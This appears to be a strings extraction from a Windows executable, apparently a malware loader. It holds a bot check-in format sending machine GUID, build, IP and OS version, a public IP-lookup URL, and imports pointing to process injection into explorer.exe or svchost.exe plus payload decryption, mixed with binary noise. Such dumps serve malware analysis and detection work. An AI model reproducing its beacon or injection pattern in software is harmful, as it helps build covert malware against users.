!This program cannot be run in DOS mode.
.ddata
`.rdata
@.data
vi^Zp)
iGa_QvR53
=t_aG#
^aG**{
*"VG/*{
w`ahGa
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
http://api.ipify.org
0.0.0.0
GUID=%I64u&BUILD=%s&INFO=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)
GUID=%I64u&BUILD=%s&INFO=%s&IP=%s&TYPE=1&WIN=%d.%d(x32)
LoadLibraryA
LoadLibraryExA
GetProcAddress
zzzzzzzzzzzzzzzzexplorer.exe
SystemRoot
\System32\svchost.exe
GetNativeSystemInfo
kernel32.dll
InternetCrackUrlA
InternetOpenA
InternetCloseHandle
InternetConnectA
InternetReadFile
InternetQueryOptionA
InternetSetOptionA
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
WININET.dll
GetAdaptersAddresses
IPHLPAPI.DLL
EnumProcesses
GetProcessImageFileNameA
PSAPI.DLL
RtlDecompressBuffer
ntdll.dll
HeapAlloc
HeapFree
GetProcessHeap
GetVersion
lstrcpyA
lstrcatA
lstrlenA
GetWindowsDirectoryA
GetVolumeInformationA
GetProcAddress
VirtualAlloc
VirtualFree
VirtualAllocEx
VirtualFreeEx
OpenProcess
TerminateProcess
CreateThread
GetProcessId
GetLastError
WriteProcessMemory
GetThreadContext
SetThreadContext
ResumeThread
WriteFile
CloseHandle
GetSystemInfo
lstrcmpiA
LoadLibraryA
GetModuleHandleA
CreateProcessA
GetEnvironmentVariableA
GetTempPathA
GetTempFileNameA
CreateFileA
GetComputerNameA
KERNEL32.dll
wsprintfA
USER32.dll
OpenProcessToken
GetTokenInformation
LookupAccountSidA
CryptAcquireContextA
CryptReleaseContext
CryptDeriveKey
CryptDestroyKey
CryptDecrypt
CryptCreateHash
CryptHashData
CryptDestroyHash
ADVAPI32.dll
0@P`p
13.82i
yY&u`~
kBRe'Ch7
\G"QQ4I
V4sCe"
[%SMgy
bQ2P*UU
.]]J+q
<.k Wr
G@>}053EH"
UYu3ssJ|@
$?-;Sk
`o+3'\)
%]L<1h{
EContent-Type: application/x-www-form-urlencoded
|